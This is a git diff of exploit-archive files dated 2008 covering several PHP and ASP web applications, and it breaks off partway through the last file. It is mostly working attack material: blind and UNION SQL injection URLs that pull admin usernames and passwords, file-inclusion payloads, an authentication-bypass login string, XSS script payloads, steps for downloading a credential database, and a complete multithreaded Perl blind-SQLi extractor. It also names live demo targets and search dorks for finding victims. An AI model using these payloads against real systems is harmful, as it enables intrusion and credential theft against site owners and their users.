+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7223.txt b/platforms/php/webapps/7223.txt
index a86d5b6e6..e118b5243 100755
--- a/platforms/php/webapps/7223.txt
+++ b/platforms/php/webapps/7223.txt
@@ -1,46 +1,46 @@
-WebStudio eCatalogue (pageid)  Blind SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script  : http://www.bdigital.biz/index.php?pageid=218
-
-DorK : ""Powered by WebStudio eCatalogue""
-
-Demo :
-_______
-
-
-http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=3
-( TRUE  )
-
-
-
-http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=4
-( FALSE )
-
-
-
-http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=5
-( FALSE )
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-11-25]
+WebStudio eCatalogue (pageid)  Blind SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script  : http://www.bdigital.biz/index.php?pageid=218
+
+DorK : ""Powered by WebStudio eCatalogue""
+
+Demo :
+_______
+
+
+http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=3
+( TRUE  )
+
+
+
+http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=4
+( FALSE )
+
+
+
+http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=5
+( FALSE )
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7224.txt b/platforms/php/webapps/7224.txt
index a1c1ac7a2..dd8f56a5e 100755
--- a/platforms/php/webapps/7224.txt
+++ b/platforms/php/webapps/7224.txt
@@ -1,47 +1,47 @@
-+---------------------------------------------------------------------------------------+
-|                                                                                       |
-|       FAQ Manager 1.2 (categorie.php cat_id) Remote SQL Injection Vulnerability       |
-|       Bug found by cOndemned                                                          |
-|                                                                                       |
-|       Script site  : http://www.4yoursite.nl/script_faq_manager.php                   |
-|                                                                                       |
-|       Greetz: ZaBeaTy, str0ke, doctor, Necro, 0in, TBH, Av...                         |
-|                                                                                       |
-+---------------------------------------------------------------------------------------+
-
-
-# source of categorie.php
-
-	[ ... ] 
-	
-	21.	$catid = $_GET['cat_id'];
-	
-	[ ... ]
-	
-	72.	$faq_query = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");
-
-	73.	while($faq = mysql_fetch_assoc($faq_query))
-
-	74.	{
-
-	75.		$faq_cat_id = ($faq['faq_cat_id']);
-
-	76.	}
-
-	77.
-
-	78.	$result = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");
-	
-	[ ... ] 
-
-
-# proof of concept
-
-	http://[host]/[faq_manager_path]/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*
-
-
-# live demo 
-	
-	http://www.4yoursite.nl/demo/faq_manager/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*
-
-# milw0rm.com [2008-11-25]
++---------------------------------------------------------------------------------------+
+|                                                                                       |
+|       FAQ Manager 1.2 (categorie.php cat_id) Remote SQL Injection Vulnerability       |
+|       Bug found by cOndemned                                                          |
+|                                                                                       |
+|       Script site  : http://www.4yoursite.nl/script_faq_manager.php                   |
+|                                                                                       |
+|       Greetz: ZaBeaTy, str0ke, doctor, Necro, 0in, TBH, Av...                         |
+|                                                                                       |
++---------------------------------------------------------------------------------------+
+
+
+# source of categorie.php
+
+	[ ... ] 
+	
+	21.	$catid = $_GET['cat_id'];
+	
+	[ ... ]
+	
+	72.	$faq_query = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");
+
+	73.	while($faq = mysql_fetch_assoc($faq_query))
+
+	74.	{
+
+	75.		$faq_cat_id = ($faq['faq_cat_id']);
+
+	76.	}
+
+	77.
+
+	78.	$result = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");
+	
+	[ ... ] 
+
+
+# proof of concept
+
+	http://[host]/[faq_manager_path]/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*
+
+
+# live demo 
+	
+	http://www.4yoursite.nl/demo/faq_manager/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7225.txt b/platforms/php/webapps/7225.txt
index 596f081e1..29dea1985 100755
--- a/platforms/php/webapps/7225.txt
+++ b/platforms/php/webapps/7225.txt
@@ -1,36 +1,36 @@
-[~] Pie Web RSS module 0.1 (lib) Remote File injulide : ) )
-[~]
-[~] download: http://pie.ekkaia.org/file/mod_rss-0.1.tar.gz
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: RedHaK Kardesime ozel tesekurler.
-[~] -----------------------------------------------------------
-
-file: rss-0.1/lib/action/rss.php
-
-c0de: 
-
-include_once("$lib/class/page.php");
-include_once("$lib/share/link.php");
-include_once("$lib/share/stdio.php");
-include_once("$lib/share/string.php");
-
-exp:
-
-http://localhost/script/[pie installation]/lib/action/rss.php?lib=ZoRLu.txt?
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-25]
+[~] Pie Web RSS module 0.1 (lib) Remote File injulide : ) )
+[~]
+[~] download: http://pie.ekkaia.org/file/mod_rss-0.1.tar.gz
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: RedHaK Kardesime ozel tesekurler.
+[~] -----------------------------------------------------------
+
+file: rss-0.1/lib/action/rss.php
+
+c0de: 
+
+include_once("$lib/class/page.php");
+include_once("$lib/share/link.php");
+include_once("$lib/share/stdio.php");
+include_once("$lib/share/string.php");
+
+exp:
+
+http://localhost/script/[pie installation]/lib/action/rss.php?lib=ZoRLu.txt?
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7227.txt b/platforms/php/webapps/7227.txt
index f72574fa1..ea98d534a 100755
--- a/platforms/php/webapps/7227.txt
+++ b/platforms/php/webapps/7227.txt
@@ -1,48 +1,48 @@
-[~] Chipmunk Topsites (Auth Bypass) SQL Injection & XSS Multiple Remote Vuln.
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: RedHaK Kardesime ozel tesekurler.
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu ( or dont write anything )
-
-note: generally admin name: admin 
-
-
-exploit for demo:
-
-http://www.chipmunk-scripts.com/topsites/login.php
-
-username: admin ' or ' 1=1--
-
-passwd: ZoRLu  ( or dont write anything )
-
-or 
-
-username: zorlu ' or ' 1=1--
-
-passwd: ZoRLu  ( or dont write anything )
-
-
-XSS:
-
-http://www.arcade-classics.net/top100/index.php?start="><script>alert()</script>
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-25]
+[~] Chipmunk Topsites (Auth Bypass) SQL Injection & XSS Multiple Remote Vuln.
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: RedHaK Kardesime ozel tesekurler.
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu ( or dont write anything )
+
+note: generally admin name: admin 
+
+
+exploit for demo:
+
+http://www.chipmunk-scripts.com/topsites/login.php
+
+username: admin ' or ' 1=1--
+
+passwd: ZoRLu  ( or dont write anything )
+
+or 
+
+username: zorlu ' or ' 1=1--
+
+passwd: ZoRLu  ( or dont write anything )
+
+
+XSS:
+
+http://www.arcade-classics.net/top100/index.php?start="><script>alert()</script>
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7228.txt b/platforms/php/webapps/7228.txt
index 08b94285d..8effbff48 100755
--- a/platforms/php/webapps/7228.txt
+++ b/platforms/php/webapps/7228.txt
@@ -1,33 +1,33 @@
-[~] Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.
-[~]
-[~] script: http://www.4yoursite.nl/script_clean_cms.php
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: RedHaK Kardesime ozel tesekurler.
-[~] -----------------------------------------------------------
-
-exp for demo:
-
-http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )
-
-http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )
-
-XSS for demo:
-
-http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id="><script>alert()</script>
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-25]
+[~] Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.
+[~]
+[~] script: http://www.4yoursite.nl/script_clean_cms.php
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: RedHaK Kardesime ozel tesekurler.
+[~] -----------------------------------------------------------
+
+exp for demo:
+
+http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )
+
+http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )
+
+XSS for demo:
+
+http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id="><script>alert()</script>
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7229.txt b/platforms/php/webapps/7229.txt
index 515942eec..f13ced3f8 100755
--- a/platforms/php/webapps/7229.txt
+++ b/platforms/php/webapps/7229.txt
@@ -1,31 +1,31 @@
-[~] FAQ Manager 1.2 Remote File injulide : ) )
-[~]
-[~] download: http://www.4yoursite.nl/downloads/faq_man_1.2.zip
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: RedHaK Kardesime ozel tesekurler.
-[~] -----------------------------------------------------------
-
-file:
-
-include/header.php
-
-exp:
-
-http://localhost/script/include/header.php?config_path=ZoRLu.txt?
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-25]
+[~] FAQ Manager 1.2 Remote File injulide : ) )
+[~]
+[~] download: http://www.4yoursite.nl/downloads/faq_man_1.2.zip
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: RedHaK Kardesime ozel tesekurler.
+[~] -----------------------------------------------------------
+
+file:
+
+include/header.php
+
+exp:
+
+http://localhost/script/include/header.php?config_path=ZoRLu.txt?
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7230.pl b/platforms/php/webapps/7230.pl
index af181906e..a40d305c1 100755
--- a/platforms/php/webapps/7230.pl
+++ b/platforms/php/webapps/7230.pl
@@ -1,199 +1,199 @@
-# Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit
-# url: http://www.4yoursite.nl/script_clean_cms.php
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://hack0wn.com && spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# Hack0wn :D
-
-my $MAX_FIELD_LENGTH = 200 ;
-my $EXIT_IF_NO_CHAR = 1 ;
-my $DEFAULT_THREADS = 15 ;
-my $DEFAULT_THREADS_TIMEOUT = 30 ;
-my @ascii = ( 32 .. 123 ) ;
-my $DEFAULT_THREADS_TIME = 1 ;
-
- 
-use LWP::UserAgent ;
- 
-sub _HELP_AND_EXIT
-{
-    die "
- 
-  ./$0 -u <url> -p <pattern>
- 
- Options:
-  -u    <url>               Ex: http://localhost/full_txt.php?id=19
-  -p    <pattern>           HTML pattern.
- 
- Other:
-  -t    <#>                 Threads, default '$DEFAULT_THREADS'.
-  -l    <#>                 Maximum table name length '$MAX_FIELD_LENGTH'.
-  -T    <#>                 Timeout.
-  -h                        Help (also with --help).
- 
-  Example:
- 
-  ./$0 -u \"http://localhost/full_txt.php?id=19\" -p Concurso
- 
-" ;
-}
- 
- 
-    my ($p, $w) = ({ @ARGV }, { }) ;
- 
-    map {
-        &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
-    } keys %$p ;
- 
-    map {
-        die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
-    } qw/-u -p/ ;
- 
-    $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
-    $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
-    $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
- 
-    map {
-        warn "[i] Getting default: $_ $w->{ $_ }\n" ;
-    } sort keys %$w ;
- 
-    ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
- 
- 
- 
- 
-sub _START_WORK
-{
-    my $p = shift ;
- 
-    my $position = 1 ;
- 
-    pipe(R, W) ;
-    pipe(Rs, Ws) ;
-    autoflush STDOUT 1 ;
- 
-    my $sql_message = '' ;
-    my $msg = '' ;
-    my @pid ;
- 
-    while( $position <= $p->{'-l'} )
-    {
-        my $cf ;
-        unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
-        push(@pid, $cf) ;
- 
-        my $count = 0 ;
-        my $can_exit ;
-        my $char_printed ;
- 
-        while(<R>)
-        {
-            chomp ;
-            push(@pid, (split(/:/))[1] ) if /^pid/ ;
- 
-            my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
-            $count++ if $pos == $position ;
- 
-            print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
- 
-            if( $res eq 'yes' and $pos == $position ){
-                    $char_printed = $can_exit = 1 ;
-                    print Ws "STOP $position\n" ;
-                    $sql_message .= chr( $ascii ) ;
-            }
- 
-            last if ( $can_exit or $count == @ascii );
-        }
- 
-        map { waitpid($_, 0) } @pid ;
- 
-        unless( $char_printed )
-        {
-            if( $EXIT_IF_NO_CHAR )
-            {
-                warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n"  ;
-                last ;
-            }
-        }
- 
-        $position++ ;
-    }
- 
-    print "[i] USER / PASSWORD:\n$sql_message\n" ;
- 
-}
- 
-sub _CHECKING
-{
-    my ($p, $position) = @_ ;
-    my $counter = 0 ;
-    my $stop_position ;
- 
-    foreach my $ascii ( @ascii )
-    {
-        $counter++ ;
- 
-        if( $counter % $p->{'-t'} == 0 )
-        {
-            my $stop_position ;
-            eval
-            {
-                $SIG{'ALRM'} = sub { die "non_stop\n" } ;
-                alarm $DEFAULT_THREADS_TIME ;
-                my $line = <Rs> ;
-                $stop_position = (split( / /, $line))[1] ;
-                alarm 0 ;
-            } ;
- 
-            if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
-        }
- 
-        unless(my $pid = fork )
-        {
-            print Ws "pid:$pid\n" or die ;
- 
- 
-            my $url = $p->{'-u'} .
-                ' AND ascii(substring((SELECT CONCAT(admin_name,0x202f20,admin_pass) FROM config LIMIT 0,1),' . $position . ',1))='. $ascii ;
- 
-            my $ua = LWP::UserAgent->new ;
-            $ua->timeout( $p->{'-T'} ) ;
- 
-            my $content ;
-            while( 1 )
-            {
-                last if $content = $ua->get( $url )->content ;
-            }
- 
-            ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
- 
-            exit( 0 ) ;
-        }
- 
-    }
-}
- 
- 
- 
-sub _IS_VULN
-{
-    my $p = shift ;
- 
-    my $ua = LWP::UserAgent->new ;
-    $ua->timeout( $p->{'-T'} ) ;
- 
-    my ( $one, $two ) = (
-        $ua->get( $p->{'-u'}." AND 1=1")->content ,
-        $ua->get( $p->{'-u'}." AND 1=2")->content ,
-    ) ;
- 
-    return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
-}
-
-# milw0rm.com [2008-11-25]
+# Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit
+# url: http://www.4yoursite.nl/script_clean_cms.php
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://hack0wn.com && spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Hack0wn :D
+
+my $MAX_FIELD_LENGTH = 200 ;
+my $EXIT_IF_NO_CHAR = 1 ;
+my $DEFAULT_THREADS = 15 ;
+my $DEFAULT_THREADS_TIMEOUT = 30 ;
+my @ascii = ( 32 .. 123 ) ;
+my $DEFAULT_THREADS_TIME = 1 ;
+
+ 
+use LWP::UserAgent ;
+ 
+sub _HELP_AND_EXIT
+{
+    die "
+ 
+  ./$0 -u <url> -p <pattern>
+ 
+ Options:
+  -u    <url>               Ex: http://localhost/full_txt.php?id=19
+  -p    <pattern>           HTML pattern.
+ 
+ Other:
+  -t    <#>                 Threads, default '$DEFAULT_THREADS'.
+  -l    <#>                 Maximum table name length '$MAX_FIELD_LENGTH'.
+  -T    <#>                 Timeout.
+  -h                        Help (also with --help).
+ 
+  Example:
+ 
+  ./$0 -u \"http://localhost/full_txt.php?id=19\" -p Concurso
+ 
+" ;
+}
+ 
+ 
+    my ($p, $w) = ({ @ARGV }, { }) ;
+ 
+    map {
+        &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
+    } keys %$p ;
+ 
+    map {
+        die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
+    } qw/-u -p/ ;
+ 
+    $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
+    $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
+    $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
+ 
+    map {
+        warn "[i] Getting default: $_ $w->{ $_ }\n" ;
+    } sort keys %$w ;
+ 
+    ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
+ 
+ 
+ 
+ 
+sub _START_WORK
+{
+    my $p = shift ;
+ 
+    my $position = 1 ;
+ 
+    pipe(R, W) ;
+    pipe(Rs, Ws) ;
+    autoflush STDOUT 1 ;
+ 
+    my $sql_message = '' ;
+    my $msg = '' ;
+    my @pid ;
+ 
+    while( $position <= $p->{'-l'} )
+    {
+        my $cf ;
+        unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
+        push(@pid, $cf) ;
+ 
+        my $count = 0 ;
+        my $can_exit ;
+        my $char_printed ;
+ 
+        while(<R>)
+        {
+            chomp ;
+            push(@pid, (split(/:/))[1] ) if /^pid/ ;
+ 
+            my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
+            $count++ if $pos == $position ;
+ 
+            print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
+ 
+            if( $res eq 'yes' and $pos == $position ){
+                    $char_printed = $can_exit = 1 ;
+                    print Ws "STOP $position\n" ;
+                    $sql_message .= chr( $ascii ) ;
+            }
+ 
+            last if ( $can_exit or $count == @ascii );
+        }
+ 
+        map { waitpid($_, 0) } @pid ;
+ 
+        unless( $char_printed )
+        {
+            if( $EXIT_IF_NO_CHAR )
+            {
+                warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n"  ;
+                last ;
+            }
+        }
+ 
+        $position++ ;
+    }
+ 
+    print "[i] USER / PASSWORD:\n$sql_message\n" ;
+ 
+}
+ 
+sub _CHECKING
+{
+    my ($p, $position) = @_ ;
+    my $counter = 0 ;
+    my $stop_position ;
+ 
+    foreach my $ascii ( @ascii )
+    {
+        $counter++ ;
+ 
+        if( $counter % $p->{'-t'} == 0 )
+        {
+            my $stop_position ;
+            eval
+            {
+                $SIG{'ALRM'} = sub { die "non_stop\n" } ;
+                alarm $DEFAULT_THREADS_TIME ;
+                my $line = <Rs> ;
+                $stop_position = (split( / /, $line))[1] ;
+                alarm 0 ;
+            } ;
+ 
+            if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
+        }
+ 
+        unless(my $pid = fork )
+        {
+            print Ws "pid:$pid\n" or die ;
+ 
+ 
+            my $url = $p->{'-u'} .
+                ' AND ascii(substring((SELECT CONCAT(admin_name,0x202f20,admin_pass) FROM config LIMIT 0,1),' . $position . ',1))='. $ascii ;
+ 
+            my $ua = LWP::UserAgent->new ;
+            $ua->timeout( $p->{'-T'} ) ;
+ 
+            my $content ;
+            while( 1 )
+            {
+                last if $content = $ua->get( $url )->content ;
+            }
+ 
+            ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
+ 
+            exit( 0 ) ;
+        }
+ 
+    }
+}
+ 
+ 
+ 
+sub _IS_VULN
+{
+    my $p = shift ;
+ 
+    my $ua = LWP::UserAgent->new ;
+    $ua->timeout( $p->{'-T'} ) ;
+ 
+    my ( $one, $two ) = (
+        $ua->get( $p->{'-u'}." AND 1=1")->content ,
+        $ua->get( $p->{'-u'}." AND 1=2")->content ,
+    ) ;
+ 
+    return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
+}
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7231.txt b/platforms/php/webapps/7231.txt
index 60ae56856..b65efeadc 100755
--- a/platforms/php/webapps/7231.txt
+++ b/platforms/php/webapps/7231.txt
@@ -1,38 +1,38 @@
-/*
---+_---=+--=_____=+++++
-
--- FuzzyLime 3.03 Local File Iclude PoC 
-    ***
-   (-0-)
-  -____======_+++++---''''
-***************************************__________________
--- Vuln 
- - code/track.php
-   
-  $m = $_GET[m];
-  $p = $_GET[p]; //1 
-  include "settings.inc.php";
-  if(!isset($_POST[url]) || !isset($_POST[title]) || !isset($_POST[excerpt])) { //2
-	header("Location: ${rooturl}index.php?s=news&p=$p&m=$m");
-  }
-  else {
-    if(file_exists("../blogs/$p.inc.php")) { //3
-	 include "../blogs/$p.inc.php";     //4 
-   ...
-1 $p is not filtered 
-2 When POST'S is set 
-3 and file exists
-4 we have lfi
-
----+++++....--___________--============
-*/
-
-
-Go to LIVE_HTTP_HEADERS in firefox or opera or whatever
-set url  http://site/path/code/track.php?p=[file] 
-set "SEND POST CONNTENT"  url=evil&title=666&excerpt=xd
-and push reply 
- 
-//Alfons Luja  25.12.2008
-
-# milw0rm.com [2008-11-25]
+/*
+--+_---=+--=_____=+++++
+
+-- FuzzyLime 3.03 Local File Iclude PoC 
+    ***
+   (-0-)
+  -____======_+++++---''''
+***************************************__________________
+-- Vuln 
+ - code/track.php
+   
+  $m = $_GET[m];
+  $p = $_GET[p]; //1 
+  include "settings.inc.php";
+  if(!isset($_POST[url]) || !isset($_POST[title]) || !isset($_POST[excerpt])) { //2
+	header("Location: ${rooturl}index.php?s=news&p=$p&m=$m");
+  }
+  else {
+    if(file_exists("../blogs/$p.inc.php")) { //3
+	 include "../blogs/$p.inc.php";     //4 
+   ...
+1 $p is not filtered 
+2 When POST'S is set 
+3 and file exists
+4 we have lfi
+
+---+++++....--___________--============
+*/
+
+
+Go to LIVE_HTTP_HEADERS in firefox or opera or whatever
+set url  http://site/path/code/track.php?p=[file] 
+set "SEND POST CONNTENT"  url=evil&title=666&excerpt=xd
+and push reply 
+ 
+//Alfons Luja  25.12.2008
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7232.txt b/platforms/php/webapps/7232.txt
index 1532de097..a2207b428 100755
--- a/platforms/php/webapps/7232.txt
+++ b/platforms/php/webapps/7232.txt
@@ -1,43 +1,43 @@
-[»] SimpleBlog 3.0 Mdb Vulnerability
-[»]
-[»] ----------------------------------------------------------
-[»] Author : EL_MuHaMMeD
-[»]
-[»] Date : 26.11.2008
-[»]
-[»] Contact : cwelmuhammed@gmail.com
-[»]
-[»] -----------------------------------------------------------
-
-
-Script : SimpleBlog 3.0
-
-Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar
-
-Dork : "inurl:simpleblog3"
-
-Our mdb path : db/simpleBlog.mdb
-
-Exploits :
-
-Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb
-
-Step 2 - Download that mdb file and read admin name & pass from "users" table.
-
-Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp
-
-Example :
-
-http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb
-
-http://www.bvrg.org.uk/simpleblog3/admin/default.asp
-
- 
-
-[»] ----------------------------------------------------------------------
-[»]
-[»] Cyber-Security.ORG - ELMuHaMMeD.COM
-[»]
-[»] ----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-25]
+[»] SimpleBlog 3.0 Mdb Vulnerability
+[»]
